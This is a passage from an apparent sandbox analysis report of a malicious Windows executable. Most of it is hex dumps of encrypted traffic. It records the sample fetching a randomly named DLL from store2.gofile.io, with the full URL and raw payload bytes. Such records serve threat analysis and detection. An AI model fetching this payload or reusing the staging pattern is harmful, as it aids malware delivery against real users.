Data Ascii: 1Xf$_q4nNJix5[)"KF]h. 0hzp2f{27{!=DL/D)afj"G-T.*gXvc0r#<Yc/zs4p`(h.esELX,&QQ>xrMU&%(@\|BRdjc
2021-10-13 19:02:54 UTC	1010	IN	Data Raw: 61 65 a0 b9 5d e3 ad af af d2 71 59 89 d2 c2 c7 0a 7f 19 32 49 51 bb 57 29 58 96 df fe 20 3b f2 86 e5 72 25 a4 57 9b 68 27 38 87 9d b3 29 de 0f 25 e6 a9 0b 19 5a 13 80 1f a7 ba b3 0b ce 10 f3 15 36 fa 11 4a d1 f4 a2 31 87 d8 aa d6 33 5e 5a fb 16 22 ac ee 45 1f 13 b3 96 d0 1a 3e c8 41 93 23 d1 17 68 4d f4 36 a6 7b 0e eb 52 fd c9 c5 f5 ea 09 b3 a7 55 89 ff 53 d0 2d e0 76 f6 05 3c c7 07 cd 24 61 75 7d b5 db 62 c8 dc a8 d7 74 3c 9c 25 ee a9 85 3b af c1 8b 0c 47 dd c2 53 7f e3 29 2b dd e9 fd 9d 71 2e 73 7b c4 41 0c b0 cd f6 c7 1c d6 02 f8 6f 62 07 45 d1 b3 a1 2a da f8 96 8f 4d 1e 39 bd e6 cf d6 a3 b0 7a 73 93 15 c3 34 f9 4f e1 c1 b9 84 98 80 c4 04 b4 1e c9 89 86 ed 57 40 98 94 0a bc 10 27 fa ed 39 fb 8a ca 45 ca ef fd 31 99 97 90 05 1b 21 2c 40 11 c7 25 d8 4c Data Ascii: ae]qY2IQW)X ;r%Wh'8)%Z6J13^Z"E>A#hM6{RUS-v<$au}bt<%;GS)+q.s{AobE*M9zs4OW@'9E1!,@%L
2021-10-13 19:02:54 UTC	1026	IN	Data Raw: 73 23 5c d4 94 e7 94 60 6c 9d 21 1c dc fa a7 79 11 2f d0 fd 25 96 76 4c 9c de 07 da 70 b1 8c d5 98 9e da 19 11 15 ff 57 6d b1 5f a9 50 e6 f1 e1 da ba c4 e9 ff d1 af c7 57 e6 62 9b 73 60 3f e0 b5 d0 7e 1d c4 c5 2a 3a 22 00 92 0f 9f 5b 5c 32 78 8c 9f 4c ef dc c8 8c a4 b1 e4 f7 71 7e 7a d0 2e 11 83 36 bf 12 35 fa fc c6 f2 90 20 d1 a0 92 20 de 40 37 58 b5 ff 05 e8 e0 3a 4c d3 2e 01 59 09 73 a7 be 13 3f 65 0e 97 78 d7 38 86 18 d1 7d 64 f2 93 11 60 db 75 76 73 68 61 11 fe cd 3d 4c c1 97 32 44 4e eb 45 48 40 38 06 dd ed 7a 76 43 3c d7 50 1e 44 07 aa 37 7b 37 f4 8c 97 a5 32 25 39 c3 96 8e 32 53 47 5f 96 56 a6 8b 6a 2f 5b 92 94 33 33 31 20 e8 7b c7 2b 63 2f 46 69 a6 9c 13 2c 3b 9c e0 83 b8 c9 88 4a 6d 7d c6 bc af 5e 73 74 90 3e 7a b1 7e 75 64 d1 18 70 84 3a 50 76 Data Ascii: s#\`l!y/%vLpWm_PWbs`?~*:"[\2xLq~z.65 @7X:L.Ys?ex8}d`uvsha=L2DNEH@8zvC<PD7{72%92SG_Vj/[331 {+c/Fi,;Jm}^st>z~udp:Pv
2021-10-13 19:02:54 UTC	1042	IN	Data Raw: ac cd c1 54 a3 6b 63 ce 0f bc aa 11 3f 07 b3 b1 cb 4d 8b 03 64 d5 c8 0f 03 ed 79 44 81 4d d1 4d 81 31 0f 33 90 3c eb 47 3b 1c 79 76 01 d1 4b 00 b6 33 d6 8a 5a 83 46 c9 57 ec c8 af 25 5a fb 70 79 da 17 5a 1b 6d 92 f1 d3 55 20 96 dc 27 9b 6f 4b 49 e2 3b 52 67 41 59 a8 c7 a1 fc 2d 4c bd bf eb 35 32 d7 36 2f a3 d1 6b 84 6f d9 c2 7c 34 f2 49 6d 0d ad e0 c8 8a ba 64 96 c1 25 3f 0d 7b b1 0b d8 d7 2c 16 75 48 c4 67 b6 e1 c7 53 6f 64 53 ea de 1f 08 22 e9 36 bb c9 b7 ec 2e cc 4e a2 02 b2 5a 13 b8 23 d4 39 f8 7b bc c8 9e dc e2 5e 8f d3 3f 31 07 dd 8d b4 ea 5b b0 c1 38 8d 98 f1 2b 13 c2 11 48 9e a5 e8 71 c4 5f bc 71 d5 da 72 6a 64 5c fc 0c df 49 e3 5d a9 18 58 ca 9c de a8 b7 6d 06 67 80 1f 67 e3 0f d1 c4 4f af 16 07 7c ac 3d d9 5e c3 0b 4d 9d a6 fa ac ee 98 02 51 bb Data Ascii: Tkc?MdyDMM13<G;yvK3ZFW%ZpyZmU 'oKI;RgAY-L526/ko\|4Imd%?{,uHgSodS"6.NZ#9{^?1[8+Hq_qrjd\I]XmggO\|=^MQ
2021-10-13 19:02:54 UTC	1058	IN	Data Raw: 03 ee e0 f0 6a df 96 aa 67 dd 5b ec 5d ac ae cc 3c 1b 8d c3 7d 60 a0 50 c0 e4 ba d0 7f 67 b2 f2 e7 db cf 7b 23 2b 93 1d 9b 84 47 d7 d3 fb 0c ec 6c 83 80 db 2f f4 54 ea a1 0e 14 2c ef ba 93 e7 5f ba 8f a0 e7 09 3a 84 ae 3c 4a c1 87 53 9d b3 f5 f1 f1 bb 94 42 41 a0 7b 02 bd a8 6d 84 ba 13 64 77 b9 8b 59 e8 6d 5c 8b 5d df 78 e4 6b d3 59 a8 1d b6 a4 67 5d 51 40 1f 3b 1d eb 7a 00 fb e5 07 1a 9c fc 3d 64 38 79 2d e7 50 ed 47 68 d8 5d 9a e5 63 b8 31 0d ae 36 e0 f9 ef 35 cd 65 26 5a 5e 6a 5e 83 c2 4b 4e a8 ad c5 52 1e 20 b5 96 99 1c d9 2d 36 78 18 bd ed 73 5a 5a 82 f1 50 07 ff 42 4d 60 19 6e ca 46 72 a1 99 ed 9a 62 b7 23 99 15 7a 91 0b 10 31 72 16 5c 75 56 56 2d 71 c0 c0 fd df 6a 13 53 3e da a7 bc 75 4e b4 91 33 86 bb 86 b5 cd 8d 1a 92 d4 02 c2 32 74 93 90 ed 85 Data Ascii: jg[]<}`Pg{#+Gl/T,_:<JSBA{mdwYm\]xkYg]Q@;z=d8y-PGh]c165e&Z^j^KNR -6xsZZPBM`nFrb#z1r\uVV-qjS>uN32t

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49753	31.14.69.10	443	C:\Users\user\Desktop\LFEs2N6DU4.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 19:02:56 UTC	1060	OUT	GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1 Host: store2.gofile.io Connection: Keep-Alive
2021-10-13 19:02:56 UTC	1060	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="Szxppkyqovxyiyryjhv.dll" Content-Length: 542208 Content-Type: application/octet-stream Date: Wed, 13 Oct 2021 19:02:56 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Powered-By: Express X-Xss-Protection: 1; mode=block Connection: close
2021-10-13 19:02:56 UTC	1060	IN	Data Raw: 58 44 63 a5 cd 21 cb 11 d6 48 51 27 17 c0 81 52 72 f1 0b a7 eb c9 9b e7 53 a0 0b bd 34 e7 95 e6 86 8c d0 bb 93 4e c6 e8 30 7f f4 db 1e 3e a8 00 52 08 2e 6f 25 a8 e2 27 e5 e3 09 c7 2f 2e 96 77 c6 83 e7 90 50 bf bd 15 99 68 af b5 d9 a5 f8 0a 44 5b 1f 35 36 4d 01 ef eb 11 d9 59 7f ef 20 54 47 c0 27 b9 f8 a0 f0 95 e7 3d cf d0 88 14 40 c6 7b d5 46 fa 4d 76 99 30 2d 0f 80 ab b6 a8 a9 e5 2b 44 d8 67 2e d8 0b 53 4e 2c c9 30 61 2b e3 04 53 5f b4 e8 61 c0 03 43 01 b3 a3 2a 0f a3 a8 48 05 7a 30 27 82 a2 92 eb 3f d8 75 d7 89 99 32 53 75 c9 dd 20 d5 9b f8 ba b3 98 38 e1 0d 2e f7 20 35 54 2e d8 df 9d 29 73 51 77 9f f0 c0 db ef 5f b2 aa ff 47 7f 57 d5 76 be 72 f4 3e c5 c7 dd 3e 49 fb 1e 93 13 c7 c6 f2 74 60 10 38 8a a3 cf 5f e0 a5 42 db a9 b5 69 11 01 92 d7 c9 5a 1a 93 Data Ascii: XDc!HQ'RrS4N0>R.o%'/.wPhD[56MY TG'=@{FMv0-+Dg.SN,0a+S_aC*Hz0'?u2Su 8. 5T.)sQw_GWvr>>It`8_BiZ
2021-10-13 19:02:56 UTC	1061	IN	Data Raw: 9e 35 66 8e b8 66 4f 06 ce c2 8c dc 67 8f a1 74 15 4d fb db 0e 86 9c 5e 02 5a 59 6a 49 9e 03 84 f6 20 a9 72 53 b1 c7 53 b2 d2 1d e2 12 46 3d df c3 f1 4c 55 bc 92 8b 77 3c f7 70 e0 ac 81 09 2a eb e8 e1 d3 8e f7 6c d7 3f 70 e4 1f 46 a8 e1 08 fd 40 f5 be 27 8a b4 76 9b 0c 05 d2 51 a4 12 4b d0 ce 9a 29 ad 8b f5 30 68 13 4a 07 ad c0 df 20 da 7c 4a c1 37 1d bc 65 35 ac f6 cf 31 99 e1 17 89 53 9e 7e b1 f0 f7 58 6a 2a 26 da 87 8e 25 17 8c 56 60 85 da 81 35 a9 9d 5a 23 a2 43 c0 24 85 45 ec ed 51 60 a5 f7 da 4d c2 7c 7a 60 04 f2 8a b1 07 cf 49 39 a6 fb 16 7a 09 78 93 fe 45 a9 f0 f4 39 dd 13 0e d8 3b 06 23 37 de d0 29 21 34 c5 2d 72 0b 3a 62 b2 a2 64 bd a1 b7 8d c0 64 8d 08 3d 16 63 44 f4 a0 c6 11 7a ae 27 b1 b8 0d 8d c8 71 14 0a 18 6e 01 95 11 d3 2e eb e0 27 dd cb Data Ascii: 5ffOgtM^ZYjI rSSF=LUw<pl?pF@'vQK)0hJ \|J7e51S~Xj&%V`5Z#C$EQ`M\|z`I9zxE9;#7)!4-r:bdd=cDz'qn.'
2021-10-13 19:02:56 UTC	1063	IN	Data Raw: 11 af ce 49 0b c8 45 ac f1 08 d7 8e 32 54 e4 19 9a ad 74 14 e1 fa fc 4e 37 f9 3a 67 53 17 1e 4b 3b 7a b9 49 55 b4 15 6b 7a c1 24 55 d0 4f 62 a5 f3 d6 1b de 2a a7 0d 6d ff 2a f4 ba 69 f2 84 f5 de bd d8 42 e5 70 0e 88 78 d9 c7 3f 23 bd 5f 77 bc e7 98 3a 85 4a fe 87 97 16 79 4c a8 44 07 fb 6b 9d e5 36 5d 82 9b e6 4f 4c 25 cb 04 8c a9 5e aa 49 0e a3 13 ac 9e d5 d4 18 a9 0f 78 27 1a 91 82 0d 33 4c 52 ba b5 9a 1b 44 73 0a 3b e4 c2 14 81 83 dd 88 82 28 82 d7 2d 7b f1 e5 79 59 e9 ca 61 22 ea 35 ca e3 89 c5 16 7f 08 c3 8e 68 7c 98 ad a9 32 67 55 46 7f 82 9a de 0a 93 1e 0f 8f 34 5b bb 6b 61 ff 57 d9 63 1d 00 54 a2 b7 ed 1a 7d 27 28 5a f1 bb 9a 45 14 51 e4 8e 1e b9 62 8b 15 b2 8b 34 bb fe 90 10 77 32 6a f9 e1 dd ac f5 65 3b 3a 31 90 8a 11 2a 7c c9 41 09 c5 ef 24 04 Data Ascii: IE2TtN7:gSK;zIUkz$UObmiBpx?#_w:JyLDk6]OL%^Ix'3LRDs;(-{yYa"5h\|2gUF4[kaWcT}'(ZEQb4w2je;:1*\|A$
2021-10-13 19:02:56 UTC	1064	IN	Data Raw: 9b 63 97 d4 24 89 70 a2 d2 1d d4 95 c5 74 2b 8c b6 7a f9 bc 27 b0 ba 8b e6 92 ef 77 c5 b8 72 de d9 5f 40 db 7a 86 af 57 46 3e d1 5c 1d bd 4e ba 81 46 b9 14 3e 25 ea 7c 7e 00 91 14 23 96 a0 ad 10 fd 3e 31 3b 4f ec a7 f3 1f 04 c8 86 dd ba b7 79 9b 35 8d d8 84 f0 0a ee 5b b6 42 16 52 53 3f 95 69 b6 55 f5 58 ef f1 e1 a0 d3 ba 2f a7 6d e6 6c 57 38 c7 69 67 32 79 b5 3b d2 04 17 db 4d a2 89 53 b6 08 54 b3 90 32 7c 5e b0 d2 b7 c3 5a a5 a4 dc 1d a8 d3 22 19 4a 74 61 18 08 e9 4a 86 fe d9 fc 60 60 15 27 95 61 41 e5 71 63 6f cd ac 0a ce fc 8c 26 6c 10 43 1e ad f7 85 ed d6 99 a2 6d 97 31 f4 95 ac 04 d7 33 fa 34 e0 5e f1 f9 e1 ca db 02 e9 ce 1c 9f 98 62 1e c4 c4 8f 46 26 4e 8c 0f 32 b9 8b 65 15 47 70 69 61 88 1d 39 39 48 95 c0 51 e9 b5 f1 03 b8 44 7b d2 e7 6a 88 3e 3f Data Ascii: c$pt+z'wr_@zWF>\NF>%\|~#>1;Oy5[BRS?iUX/mlW8ig2y;MST2\|^Z"JtaJ``'aAqco&lCm134^bF&N2eGpia99HQD{j>?
2021-10-13 19:02:56 UTC	1068	IN	Data Raw: bb 00 63 0e 8f 53 da bb f1 5b 92 1d 95 24 2e 15 d9 d5 c8 e5 d1 91 fd 84 13 31 24 6d 33 df c9 11 0a e5 e2 9f 9b ac a8 43 c7 c9 be 98 7d 4d fb 8a 95 6b f9 5b df 53 d5 08 23 d0 87 e6 5e 59 34 fc 61 23 17 00 9d cb f1 62 73 2e e6 0c 49 f0 b4 37 6c aa 7f 49 ce 1a 4d 42 a8 18 f6 8e 3e 55 f5 31 b1 bb a7 64 9b c3 f7 43 8f 9d 1f 69 46 12 f7 84 f8 4e fd ac c9 2d 71 18 3e 3d 07 7e b6 0b 19 b9 0b 79 26 51 ad 73 2f ff a6 c6 47 03 72 0d ed f5 22 70 39 f0 38 bb f3 6c 0b ab 39 7c 54 cd ff bc 39 eb 47 2b 68 6b ae c1 b6 4a 42 f1 29 d0 26 48 b2 46 2f 2e f8 34 77 1b 3d 22 c8 cd a9 26 2c 41 f0 da 19 8f 17 f1 6f 37 23 a0 7e 5e 34 5a 55 6e 0f a6 2d 14 61 2f 78 a5 26 84 8a ab 21 89 fb 6a d2 0b 62 8e a4 ec 4b a4 65 45 ac b0 a3 81 54 c9 35 d2 f7 d7 00 69 ce f5 b1 21 95 81 fa 66 ad Data Ascii: cS[$.1$m3C}Mk[S#^Y4a#bs.I7lIMB>U1dCiFN-q>=~y&Qs/Gr"p98l9\|T9G+hkJB)&HF/.4w="&,Ao7#~^4ZUn-a/x&!jbKeET5i!f
2021-10-13 19:02:56 UTC	1074	IN	Data Raw: 0b 0f 49 72 77 6e 26 29 ab ed a0 44 16 f9 73 d0 2c 48 5e 14 74 8e 3f d6 84 c6 5e d3 9b 8b 3a 94 b2 e1 da ba 8a 9f 77 6d 1e 07 a1 40 ab f9 42 cb fe ee 49 cf a4 4b ad 9e 3a 10 90 87 63 46 8b 99 67 39 e7 ee 22 55 a4 44 c3 91 71 d5 b3 85 01 7a 78 f6 93 2c f8 6f b6 55 70 d3 d8 85 ac 07 9d c8 6c e8 2b 02 4c 5d d3 0a 18 5b 30 8a e7 60 ad a8 fa 9e f7 16 6d 14 86 af 3c c8 fb fa f9 1f 16 7c 28 e8 b3 42 76 52 b5 ea d4 5a 37 c1 c9 58 df d7 b7 6c 4a af 29 e0 fc ea 7d 2d 94 e5 00 54 6d 19 01 1c 1a 97 ae b8 82 e3 f8 d5 4f ca 77 43 90 ea e1 0c 65 9c d6 4f 3b f7 06 1a f8 e4 c0 e8 eb 70 fb 6d 27 79 81 1a 66 c5 e7 a7 df c7 a2 37 ad c9 51 cd 8c 0f b0 57 1a 8c 4b 68 11 3b 08 97 f2 5b d8 92 64 d2 ae 9d 28 17 b1 f6 1a cd 5d ac 48 cb f5 1a 40 1c 0f fd e8 b2 29 ea 19 1c b4 6a e7 Data Ascii: Irwn&)Ds,H^t?^:wm@BIK:cFg9"UDqzx,oUpl+L][0`m<\|(BvRZ7XlJ)}-TmOwCeO;pm'yf7QWKh;[d(]H@)j
2021-10-13 19:02:56 UTC	1081	IN	Data Raw: 46 8b 85 25 80 bd 4b 18 0d 6c ef 3f 1a 3a 12 73 09 1e 8d 00 df b5 83 1c c1 0a 06 49 65 1c ba 95 bd 88 45 b0 4b 99 5b 29 61 bd ef 96 83 3e 27 90 56 18 9c c3 b6 52 f9 2b 8d 5c d5 d6 c7 be 58 91 42 13 a5 7e 76 ee 8f 4b 07 b5 91 d7 55 72 c7 5b f6 51 7d ac f8 af 33 9d 14 bb 02 f8 6e 08 af 06 ac a6 62 bd d8 25 ad 1b 9b 4f 3a 56 a2 c1 55 b4 ce db 4c b9 1e 2a 41 9f bd fb d3 1f f1 47 94 2b 92 7a bd 90 c0 e4 59 98 ea 34 de fc da 75 32 45 3a 8d 30 6a 7b 0e 9a 44 0b 75 e7 60 a9 6d 4e 5a 7e 41 95 63 85 a8 60 9a 8e 1a 82 45 bd 8c ec 79 53 b9 cc 66 b3 35 62 f2 3d fb 6c 19 f4 c3 66 d9 ca 5b 61 46 43 ec 5c dd 93 cb 65 15 62 1c 30 d8 a2 48 31 ac db 03 e3 24 c7 3a 8a 71 d3 4e 5d b5 97 b8 34 b3 07 72 c6 50 0c 79 32 30 e0 be 74 e7 6a 9a 45 29 88 39 8a 8c b0 17 29 00 c6 7b 96 Data Ascii: F%Kl?:sIeEK[)a>'VR+\XB~vKUr[Q}3nb%O:VUL*AG+zY4u2E:0j{Du`mNZ~Ac`EySf5b=lf[aFC\eb0H1$:qN]4rPy20tjE)9){
2021-10-13 19:02:56 UTC	1089	IN	Data Raw: c9 73 4d dc 0c 4e 2f 16 d4 9a 83 65 18 a9 62 31 94 2f 72 bb 3d 22 33 8d 97 43 6c 03 dd 00 28 22 80 23 34 0a c8 4d f3 d7 f9 8a 07 0c d0 90 ed 81 53 9f ce 4d 72 71 ec 67 35 1c 44 0d 68 78 ce 74 b1 a7 bc 3d a9 69 49 58 6d 06 c5 db cf 67 b4 77 8b c1 ea 1d dc 53 25 93 33 5f 71 05 e7 ec d5 90 6b 3a 51 bd c7 56 a2 eb a3 73 f1 de d9 a4 5f 2e a1 4c f4 17 a2 fd 8f 70 93 6b 58 8e 77 e2 c0 cc f5 50 91 82 e7 60 f1 fd 12 b2 18 27 62 3f ce 2e df 08 fc 74 06 5d 66 d3 41 15 8d df df 47 be d3 41 c4 4f 02 6e b6 7d c7 d8 ec 6a 16 10 97 03 83 da ad c9 12 28 70 3a e0 0e 93 df ac 77 23 8a 7e b9 fe 83 4b 92 02 4d 64 01 4c 39 5a 7f 5d 81 a8 18 3f 1f 4f ee f1 f9 ab 06 7b 62 e2 a1 bd 3f e6 f9 5e 3e a8 1c 0b ed 20 bb 7e dc c4 f1 b7 a1 20 7e 90 14 45 f5 10 9a 7b bb 4b f1 bf e8 a1 2c Data Ascii: sMN/eb1/r="3Cl("#4MSMrqg5Dhxt=iIXmgwS%3_qk:QVs_.LpkXwP`'b?.t]fAGAOn}j(p:w#~KMdL9Z]?O{b?^> ~ ~E{K,
2021-10-13 19:02:56 UTC	1098	IN	Data Raw: 2b 1c 1f 4a 7c be 79 d5 29 92 24 d2 60 49 e9 4a 65 ca fc 38 f9 78 7e 25 9a b7 33 bb 58 69 1c 2b 83 9e fe f5 2d 32 c6 bf 20 f5 70 70 fd 45 33 71 8a 74 17 2f 54 77 85 69 f4 d7 6a a9 d3 9e d7 33 2f d1 67 9d aa be 99 3e 71 59 b9 93 38 89 8e 50 a2 83 3a fd 76 5e 90 1e d3 4e 39 f9 f4 19 42 f0 e1 aa aa 4a fd 05 d5 08 a5 38 d4 49 ba 1e cd 51 4f ce 33 e7 fe f5 16 bf 0d a3 98 2f 8c 08 9e b1 74 11 d8 56 1b 51 6d c6 6c dc 0b 0f b4 3d 78 81 eb 0c 0f 65 b0 9d cc 0c 50 1a 78 8f de 4a fb 38 b9 c8 a4 b2 f4 27 61 a9 64 41 64 0d 5b f3 72 2b 70 73 14 05 46 31 f2 5b f4 f2 5e c9 b1 ee 24 55 8e 5a 25 94 9f e2 58 b4 87 2b b1 10 61 72 c4 b1 ed fc 2d fd 09 03 e5 47 1f e6 91 e4 e2 eb b5 03 4f ac 68 77 53 b3 f3 ad d8 67 d0 10 f4 43 59 e8 27 1a 78 1e 43 c8 de 33 19 bd 9c d2 9e 1f 54 Data Ascii: +J\|y)$`IJe8x~%3Xi+-2 ppE3qt/Twij3/g>qY8P:v^N9BJ8IQO3/tVQml=xePxJ8'adAd[r+psF1[^$UZ%X+ar-GOhwSgCY'xC3T
2021-10-13 19:02:56 UTC	1099	IN	Data Raw: 3c 04 58 39 d1 c2 04 cc 4b b5 64 de 86 f2 69 4a a7 c5 0f 5f 52 2d 72 f4 7e 9f 67 a3 0f 85 b1 cc 71 1e ab 12 8d 0b 19 0a 44 af 07 98 4e c6 e2 e6 a8 b9 04 21 9a 5b fb 4b 33 3a 26 1a cd 6b 85 66 76 36 8e ca bb df 68 4c a6 ff 05 fb ff c7 55 bf 50 78 ee 34 0d 5f 37 cd c9 af ff 1c 5a 61 54 10 46 b3 97 36 d3 e2 f2 b9 76 92 a0 01 8e bf 18 c4 97 40 4e 1f c7 1e 55 bb 9d ed e2 cf a2 76 a5 68 93 d4 22 ef ec 4d 1e bf 9d f3 46 e5 16 39 71 c1 de 92 a2 04 b5 63 39 29 d8 fe a0 d6 1c dc af b1 ed 58 1d 91 91 c0 82 0b d5 af 88 43 7c 16 81 62 03 a0 82 af 2d 93 3a 66 0b 1b 9f 14 91 27 3c 2c 96 9d bb 0a ec 0d 8c 3c cb c8 87 79 d3 16 fb 33 d4 7a b8 60 27 68 ed 78 3c 9f 7a 27 be 67 09 ff 35 b2 6f 0c 0d 73 90 ee 78 9f e2 57 80 ae 87 e0 79 a9 81 c0 e5 41 d6 53 77 79 10 49 67 4a c6 Data Ascii: <X9KdiJ_R-r~gqDN![K3:&kfv6hLUPx4_7ZaTF6v@NUvh"MF9qc9)XC\|b-:f'<,<y3z`'hx<z'g5osxWyASwyIgJ
2021-10-13 19:02:56 UTC	1111	IN	Data Raw: b7 5e 67 e8 7a 1a 00 f7 17 49 ff 11 01 ac 14 c1 9e d5 a0 58 42 01 5b 47 6b 35 8a 86 a8 50 55 a5 0f ba 2a 6e b3 e5 c5 41 9b 26 c2 0b 4a 56 40 a0 b9 1a 0e 39 5d 0e 3b e0 2e 24 8c 00 3c 03 4e e8 da 78 0c 1f a6 09 e8 f1 19 46 90 ae 94 30 28 a9 f7 af 34 01 02 b2 2f 1a 68 d1 55 ec 59 e9 a8 97 11 02 4d 8f bc 86 da 0a 24 6e 54 15 50 2e 40 85 8e 77 b7 c8 86 c4 7d 23 30 b0 3d 76 b9 44 b8 6c f6 b4 40 29 c5 ef 45 6d 76 47 7c 93 29 60 03 1a 3c 17 78 f6 8e 62 0b 11 05 0c dc 60 72 b6 2d 88 b3 86 95 5f 7d bc 24 fb d0 99 42 d5 79 4e 22 18 9a c3 79 32 2c 15 d5 5d a5 8f 75 f7 7d 2a 16 37 66 47 a1 41 01 99 9c 24 3c 50 3d 2f e4 85 44 de 85 4a 54 91 4e 46 2c b7 6d d9 3a c5 b2 69 ca cf 12 85 ce fe 0d c0 11 40 b5 75 88 33 8e 83 11 00 5d 4b ef f6 ae f2 94 c6 61 f1 23 9b 81 e6 45 Data Ascii: ^gzIXB[Gk5PUnA&JV@9];.$<NxF0(4/hUYM$nTP.@w}#0=vDl@)EmvG\|)`<xb`r-_}$ByN"y2,]u}7fGA$<P=/DJTNF,m:i@u3]Ka#E
2021-10-13 19:02:56 UTC	1123	IN	Data Raw: cc 4d 2c 59 99 71 4d 7e a9 84 f4 63 1e 2f 0f da 93 6c 62 d3 15 85 87 f6 f6 d3 aa 94 01 02 55 d8 40 4b ed af e5 d6 70 c0 83 05 c0 b1 e9 d0 46 48 d9 a7 18 a1 79 0d 43 41 eb e7 5b a7 4c 33 c1 70 d2 bd c4 43 56 98 99 c5 68 68 75 46 87 0d 46 66 25 e9 b2 cc cc 30 82 bf ea 84 d8 d9 3a a9 d4 ee 82 06 35 e6 bb 47 15 b5 4e e6 ac 29 fb 39 12 fe cc d4 8e 92 93 28 e2 cc 3a 89 f8 26 30 82 44 a5 60 60 42 72 78 e8 c5 d0 a3 e7 60 bc e7 3c 61 0c d0 2a 1a 50 43 b7 a0 47 90 5e a6 02 78 3f a0 83 cb 20 94 a2 3f 35 97 1a ad 21 2c f1 74 35 fa 2e df 0f 6f 5b f8 97 40 b4 29 ac 25 b9 e0 1b ae cd cb ae 88 da f4 ea fc f5 e2 00 92 9a dc 33 15 8f 5f eb fb 94 e8 7c f5 a7 64 8b c6 1a c9 5f a0 e3 6f 2b 9f fb 48 da 07 e8 fb 7a 84 ca 61 8b e9 e1 18 24 16 51 a5 ec b3 fa 05 84 cb 33 a3 64 da Data Ascii: M,YqM~c/lbU@KpFHyCA[L3pCVhhuFFf%0:5GN)9(:&0D``Brx`<a*PCG^x? ?5!,t5.o[@)%3_\|d_o+Hza$Q3d
2021-10-13 19:02:56 UTC	1124	IN	Data Raw: 19 df 7e 68 1a 83 f8 a8 a9 ab 3e d4 66 60 05 3f ae 65 79 8f 16 0e de 92 23 68 f0 e9 a2 27 c5 ee 3d 12 a8 be 32 ac a3 fb 98 a0 09 8b 27 46 15 d1 3f 6b a3 5e f7 7e a6 85 ac 40 e8 07 16 85 24 d5 1d 8d b4 98 62 03 5f 32 c2 6e 80 16 87 b1 2b cb a9 a7 4e 1f b4 64 e2 aa 95 4f 0c 59 5c 6d b0 a2 7a 7f d7 bb ce 12 a4 0a fb 83 3d 0e ca 37 bb 83 4c c5 2a 92 26 fd 2c 18 66 da ac 0e 61 03 46 90 59 60 51 06 2d 28 d0 93 e0 51 1d 60 cd 1d 8e 67 09 37 4d 12 17 82 5b c6 f2 31 20 9e 5d b8 13 31 c6 8f 5d fe 1f 5c 15 69 08 d7 8e 3f 5c e6 4d 01 b6 6e 8c 53 83 ab cb 8f 8b 6f 40 cb 53 2a 85 f5 2a b7 2d 0d 46 26 a5 3f 87 b4 a1 fc 50 69 a3 8a b2 ed 11 b1 f5 ca 91 e8 7e 0d 76 5e d9 59 91 32 f0 b0 ef 57 88 39 5b 29 c8 1f 7b a9 09 14 63 c4 cf 0f 24 5a b0 dc d4 81 e0 61 9b c5 82 b5 e3 Data Ascii: ~h>f`?ey#h'=2'F?k^~@$b_2n+NdOY\mz=7L&,faFY`Q-(Q`g7M[1 ]1]\i?\MnSo@S*-F&?Pi~v^Y2W9[){c$Za
2021-10-13 19:02:56 UTC	1139	IN	Data Raw: 8d 49 03 14 13 0c d7 55 37 11 59 2f 87 ba c1 79 9b e1 ea a2 80 c1 4c 18 5d e7 be 7e a4 44 e9 25 94 f9 3c ca 77 72 28 8d 9b db a6 2f 1b ec 28 73 7c 7c 94 86 5b 21 99 67 d7 82 57 79 3f f5 0b 3c bf d3 c4 df 21 b7 86 87 14 c8 24 3c 7e ea 5a a9 0c 4e b6 40 9a 04 5f e5 f2 8a d5 e5 f3 3f fa c5 7a 35 bd 37 c5 a2 05 77 e0 fe c3 c3 ae cb 06 e1 71 82 9b fe f8 23 d6 c4 ef c7 af 56 ff 67 6a af da 7c 08 07 2e 0d 9c 00 bd 62 4e 73 0c 62 86 33 8c cd 2b 07 c0 16 24 b4 22 87 c6 56 19 17 71 bd dd 04 69 22 79 eb e7 43 20 cc af 4c 07 ab 59 a0 fc 89 0b be e7 53 55 55 eb a1 f2 50 a6 8c 27 e5 0b f0 4d 6c f2 8c 39 c0 ca 7b fa 5b fc 87 d8 73 d1 e9 d6 07 bd 17 dd 19 c1 bd 81 e4 2a ee 69 c4 af 6a 90 25 0e 83 bf f3 62 85 30 65 72 bb f4 d6 be 69 a3 05 25 ba 32 37 cc c9 c9 5b 8d 0d bd Data Ascii: IU7Y/yL]~D%<wr(/(s\|\|[!gWy?<!$<~ZN@_?z57wq#Vgj\|.bNsb3+$"Vqi"yC LYSUUP'Ml9{[s*ij%b0eri%27[
2021-10-13 19:02:56 UTC	1155	IN	Data Raw: d3 5e d3 ba 61 d7 e1 25 90 65 28 23 cf 28 78 fa 4e 49 01 09 f6 43 71 44 b2 f5 03 06 5c 31 5c 3f 92 54 c2 9c 27 3e 46 a8 e7 f4 1d 77 8c c5 ad a3 a9 77 3c fa e6 62 fb a8 68 52 6f d8 9c fb 4f 86 a2 59 ba 94 d0 d5 fc 2c 29 15 19 0a 1c cd 44 a1 07 b8 3c 76 a4 50 30 02 35 71 0d de a5 68 8c 12 aa d4 84 38 aa 92 2d e6 cc cb b8 85 53 6b 3c 5d 71 80 fd 2a 9a ce 04 e7 73 f7 05 45 ec f4 0d 1c 34 ac b3 a7 67 e5 09 b6 03 ba 2c 1c c0 d5 58 5d 63 48 b3 69 fa fd 0c 46 79 ba b9 f6 0a 87 5b 4f 0e 7c f6 ec f8 0b 02 f4 64 6e ca 08 e1 9d 90 20 33 97 b1 a6 3f 7e 8e 0b a1 2a 81 0a ce 28 d4 bd 26 30 a5 8a a9 bd 74 e6 b7 0c 82 0d 33 f2 92 62 32 62 77 30 0d 84 4e d2 9b 0f 6b 5f c3 96 32 14 73 3d 11 2a 94 61 64 c7 aa 7b 1b a0 c9 02 6c 04 fc 26 ba 8d 6e e7 48 1c e1 6c dc dd 21 d9 b6 Data Ascii: ^a%e(#(xNICqD\1\?T'>Fww<bhRoOY,)D<vP05qh8-Sk<]qsE4g,X]cHiFy[O\|dn 3?~(&0t3b2bw0Nk_2s=*ad{l&nHl!
